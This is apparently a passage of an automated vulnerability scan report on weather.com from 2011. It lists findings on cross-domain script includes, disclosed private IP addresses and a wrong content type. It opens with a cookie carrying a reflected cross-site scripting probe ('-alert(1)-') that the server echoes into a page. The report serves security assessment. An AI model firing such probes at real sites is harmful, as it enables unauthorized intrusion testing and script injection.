fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A6%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fpagelet8cd82%5C%22-alert(1)-%5C%22370523ec97%2Fbc%2F56967%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A6%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Date: Thu, 24 Mar 2011 17:40:12 GMT
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:40:41 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii2x04
X-Varnish: 2184711165
Connection: keep-alive
Content-Length: 159890

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssVersion/pagelet8cd82"-alert(1)-"370523ec97/bc/favicon2.ico?">


<script type="text/javascript" src="http://s.imwx.com/v.20101122.141150/js/yuiloader-header-startup.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://s.imwx.com/global/common/elements/javascript/a21-2_3.js"></script>


<script type="text/javascript" src="http://d.imwx.com/js/wx-a21-plugthis-2_0.js"></script>
...[SNIP]...
5.8. http://www.weather.com/services/desktop.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com
Path:   /services/desktop.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /services/desktop.html HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/weather/health/beauty/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; RMID=c245359a4d8b7f55; LocID=; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fweather%2Fhealth%2Fbeauty%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988047405%7D; fromStr=hdr_locations; s_pers=%20s_nr%3D1300988111198%7C1303580111198%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Ddeepvert%2525253A/weather/health/beauty/%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/services/desktop.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Date: Thu, 24 Mar 2011 17:37:25 GMT
Pragma: no-cache
Content-Type: text/html; charset=iso-8859-1
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
SVRNAME: web1x10
Expires: Thu, 24 Mar 2011 17:36:38 GMT
Connection: keep-alive
Content-Length: 96326

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Free Desktop Weather and Alerts from The Weather Channel</title>


<meta name="descr
...[SNIP]...
<!-- DFP -->

<script type="text/javascript" src="http://s.imwx.com/v.20101222.3/js/legacy/ext-divtools.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s.imwx.com/v.20110214.1/global/common/elements/javascript/a21-2_3.js"></script>
<script src="http://j.imwx.com/v.20110214.1/common/a21/plugins/a21plugins.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://j.imwx.com/common/header/javascript/eventbroadcaster.js"></script>
...[SNIP]...
</style>
<script type="text/javascript" src="http://s.imwx.com/js/2.8.0r4/yuiloader-dom-event/yuiloader-dom-event.js"></script>
<script type="text/javascript" src="http://j.imwx.com/v.20100826.0/common/header/javascript/wx-header-events.js"></script>
...[SNIP]...
5.9. http://www.weather.com/weather-apps/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com
Path:   /weather-apps/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /weather-apps/ HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=2; RMID=c245359a4d8b7f55; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A2%2C%22to%22%3A4.4%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300987770411%7D; rsi_segs=D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CUndeclared%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fromStr=nav_primary; s_pers=%20s_nr%3D1300987998310%7C1303579998310%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dhomepage%2525253A/index.html%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/weather-apps/%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Thu, 24 Mar 2011 17:32:45 GMT
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:37:44 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii2x00
X-Cache-Hits: 1
X-Varnish: 1096856222 1096828614
Connection: keep-alive
Content-Length: 135009

<!DOCTYPE HTML>

<html lang="en">
<head>


<TITLE>Weather App Index ... A listing of weather apps from weather.com</TITLE>
<META name="Description"
...[SNIP]...
</style>


<script type="text/javascript" src="http://s.imwx.com/v.20101122.141150/js/yuiloader-header-startup.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://s.imwx.com/global/common/elements/javascript/a21-2_3.js"></script>


<script type="text/javascript" src="http://d.imwx.com/js/wx-a21-plugthis-2_0.js"></script>
...[SNIP]...
5.10. http://www.weather.com/weather/health/beauty/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com
Path:   /weather/health/beauty/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /weather/health/beauty/ HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/activities/driving/rushhour/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=3; RMID=c245359a4d8b7f55; rsi_segs=K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Factivities%2Fdriving%2Frushhour%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988001253%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fromStr=nav_secondary; s_pers=%20s_nr%3D1300988045611%7C1303580045611%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Ddeepvert%2525253A/activities/driving/rushhour/index.html%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/weather/health/beauty/%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Language: en-US
Content-Type: text/html;charset=ISO-8859-1
Server: Apache
Vary: Accept-Encoding
SVRNAME: web2x11
Date: Thu, 24 Mar 2011 17:33:32 GMT
Connection: keep-alive
Content-Length: 116103


       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">


   <head>
       <meta http-equiv="co
...[SNIP]...
</style>
<script type="text/javascript" src="http://s.imwx.com/js/2.8.0r4/yuiloader-dom-event/yuiloader-dom-event.js"></script>
<script type="text/javascript" src="http://j.imwx.com/v.20100826.0/common/header/javascript/wx-header-events.js"></script>
...[SNIP]...
6. Private IP addresses disclosed  previous  next
There are 5 instances of this issue:

6.1. http://www.weather.com/activities/driving/rushhour/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com
Path:   /activities/driving/rushhour/

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /activities/driving/rushhour/ HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=2; RMID=c245359a4d8b7f55; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A2%2C%22to%22%3A4.4%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300987770411%7D; rsi_segs=D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CUndeclared%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fromStr=nav_secondary; s_pers=%20s_nr%3D1300987999757%7C1303579999757%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dhomepage%2525253A/index.html%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/activities/driving/rushhour/%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 24 Mar 2011 17:32:46 GMT
Pragma: no-cache
Content-Type: text/html; charset=iso-8859-1
Server: Apache
SVRNAME: web1x10
VarnishSet: web
X-Varnish: 1455522174
Vary: Accept-Encoding
Content-Length: 96659

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<HTML>
<HEAD>
<TITLE>Traffic reports for rush hour traffic conditions and delays from weather.com<
...[SNIP]...
<% /**
       var remoteAddr="172.16.24.21";
       
       var cssSpot = '/v.20101026.1';
       var extdivtoolsVAR = '/v.20101222.3';
       var triggerParamsstdLauncherVAR = '/v.20100929.6';
       var bust_hat='/v.20100727.0';
       var bust_hpCSS='/v.20100304.2';
       
...[SNIP]...
l ads test code
/*
if (adTest)
{
if ((remoteAddr.indexOf("10.") == 0)||
(remoteAddr.indexOf("169.254.") == 0)||
(remoteAddr.indexOf("192.168.") == 0)||
(remoteAddr.indexOf("172.16.24.25") == 0))
{
    OAS_host=adTest;
}
}
*/
OAS_target="_top";OAS_version=10;OAS_rn='001234567890';OAS_rns='1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring(2,11);
...[SNIP]...
6.2. http://www.weather.com/mobile/swap/send_sms_to_phone.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com
Path:   /mobile/swap/send_sms_to_phone.html

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /mobile/swap/send_sms_to_phone.html?from=hdr_locations HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/weather/health/beauty/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; fromStr=; RMID=c245359a4d8b7f55; LocID=; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fweather%2Fhealth%2Fbeauty%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988047405%7D; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Ddeepvert%2525253A/weather/health/beauty/%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/weather/health/beauty/%25252523%252526ot%25253DA%3B; s_pers=%20s_nr%3D1300988109827%7C1303580109827%3B

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Date: Thu, 24 Mar 2011 17:37:26 GMT
Pragma: no-cache
Content-Type: text/html; charset=iso-8859-1
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
SVRNAME: web1x13
Expires: Thu, 24 Mar 2011 17:36:18 GMT
Connection: keep-alive
Content-Length: 34038

<HTML>
   <HEAD>
    <TITLE>Wireless Internet</title>
<script language="JavaScript">var ts_pageid="59201";var ts_pagename="/mobile/swap/send_sms_to_phone.html";var ts_level1="MOBILE";var ts_level2="swap
...[SNIP]...
<% /**
       var remoteAddr="172.16.24.21";
       
       var cssSpot = '/v.20101026.1';
       var extdivtoolsVAR = '/v.20101222.3';
       var triggerParamsstdLauncherVAR = '/v.20100929.6';
       var bust_hat='/v.20100727.0';
       var bust_hpCSS='/v.20100304.2';
       
...[SNIP]...
l ads test code
/*
if (adTest)
{
if ((remoteAddr.indexOf("10.") == 0)||
(remoteAddr.indexOf("169.254.") == 0)||
(remoteAddr.indexOf("192.168.") == 0)||
(remoteAddr.indexOf("172.16.24.25") == 0))
{
    OAS_host=adTest;
}
}
*/
OAS_target="_top";OAS_version=10;OAS_rn='001234567890';OAS_rns='1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring(2,11);
...[SNIP]...
6.3. http://www.weather.com/services/desktop.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com
Path:   /services/desktop.html

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /services/desktop.html HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/weather/health/beauty/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; RMID=c245359a4d8b7f55; LocID=; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fweather%2Fhealth%2Fbeauty%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988047405%7D; fromStr=hdr_locations; s_pers=%20s_nr%3D1300988111198%7C1303580111198%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Ddeepvert%2525253A/weather/health/beauty/%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/services/desktop.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Date: Thu, 24 Mar 2011 17:37:25 GMT
Pragma: no-cache
Content-Type: text/html; charset=iso-8859-1
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
SVRNAME: web1x10
Expires: Thu, 24 Mar 2011 17:36:38 GMT
Connection: keep-alive
Content-Length: 96326

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Free Desktop Weather and Alerts from The Weather Channel</title>


<meta name="descr
...[SNIP]...
<% /**
       var remoteAddr="172.16.24.23";
       
       var cssSpot = '/v.20101026.1';
       var extdivtoolsVAR = '/v.20101222.3';
       var triggerParamsstdLauncherVAR = '/v.20100929.6';
       var bust_hat='/v.20100727.0';
       var bust_hpCSS='/v.20100304.2';
       
...[SNIP]...
l ads test code
/*
if (adTest)
{
if ((remoteAddr.indexOf("10.") == 0)||
(remoteAddr.indexOf("169.254.") == 0)||
(remoteAddr.indexOf("192.168.") == 0)||
(remoteAddr.indexOf("172.16.24.25") == 0))
{
    OAS_host=adTest;
}
}
*/
OAS_target="_top";OAS_version=10;OAS_rn='001234567890';OAS_rns='1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring(2,11);
...[SNIP]...
6.4. http://www.weather.com/weather/health/beauty/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com
Path:   /weather/health/beauty/

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /weather/health/beauty/ HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/activities/driving/rushhour/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=3; RMID=c245359a4d8b7f55; rsi_segs=K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Factivities%2Fdriving%2Frushhour%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988001253%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fromStr=nav_secondary; s_pers=%20s_nr%3D1300988043887%7C1303580043887%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Ddeepvert%2525253A/activities/driving/rushhour/index.html%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/weather/health/beauty/%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Language: en-US
Content-Type: text/html;charset=ISO-8859-1
Server: Apache
Vary: Accept-Encoding
SVRNAME: web3x02
Date: Thu, 24 Mar 2011 17:35:19 GMT
Connection: keep-alive
Content-Length: 116103


       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">


   <head>
       <meta http-equiv="co
...[SNIP]...
<script type="text/javascript">
   // Global Cache busting section
       var remoteAddr="172.16.118.30";
       

                   var cssSpot = '/v.20101026.1';
           var extdivtoolsVAR = '/v.20101222.3';
           var triggerParamsstdLauncherVAR = '/v.20100929.6';
           var bust_hat = '/v.20100727.0';
           var bust_globalNav='/v.
...[SNIP]...
cial ads test code
if (adTest)
{
if ((remoteAddr.indexOf("10.") == 0)||
(remoteAddr.indexOf("169.254.") == 0)||
(remoteAddr.indexOf("192.168.") == 0)||
(remoteAddr.indexOf("172.16.24.25") == 0))
{
    OAS_host=adTest;
}
}

OAS_target="_top";OAS_version=10;OAS_rn='001234567890';OAS_rns='1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring(2,11);
f
...[SNIP]...
6.5. http://www.weather.com/weather/health/beauty/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com
Path:   /weather/health/beauty/

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /weather/health/beauty/ HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/activities/driving/rushhour/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=3; RMID=c245359a4d8b7f55; rsi_segs=K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Factivities%2Fdriving%2Frushhour%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988001253%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fromStr=nav_secondary; s_pers=%20s_nr%3D1300988045611%7C1303580045611%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Ddeepvert%2525253A/activities/driving/rushhour/index.html%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/weather/health/beauty/%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Language: en-US
Content-Type: text/html;charset=ISO-8859-1
Server: Apache
Vary: Accept-Encoding
SVRNAME: web2x11
Date: Thu, 24 Mar 2011 17:33:32 GMT
Connection: keep-alive
Content-Length: 116103


       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">


   <head>
       <meta http-equiv="co
...[SNIP]...
<script type="text/javascript">
   // Global Cache busting section
       var remoteAddr="172.16.183.25";
       

                   var cssSpot = '/v.20101026.1';
           var extdivtoolsVAR = '/v.20101222.3';
           var triggerParamsstdLauncherVAR = '/v.20100929.6';
           var bust_hat = '/v.20100727.0';
           var bust_globalNav='/v.
...[SNIP]...
cial ads test code
if (adTest)
{
if ((remoteAddr.indexOf("10.") == 0)||
(remoteAddr.indexOf("169.254.") == 0)||
(remoteAddr.indexOf("192.168.") == 0)||
(remoteAddr.indexOf("172.16.24.25") == 0))
{
    OAS_host=adTest;
}
}

OAS_target="_top";OAS_version=10;OAS_rn='001234567890';OAS_rns='1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring(2,11);
f
...[SNIP]...
7. Content type incorrectly stated  previous
There are 2 instances of this issue:

7.1. http://www.weather.com/pagelet/loc/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.weather.com
Path:   /pagelet/loc/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /pagelet/loc/ HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsr.a=1300987732569; fv=1

Response

HTTP/1.1 200 OK
Date: Thu, 24 Mar 2011 17:28:19 GMT
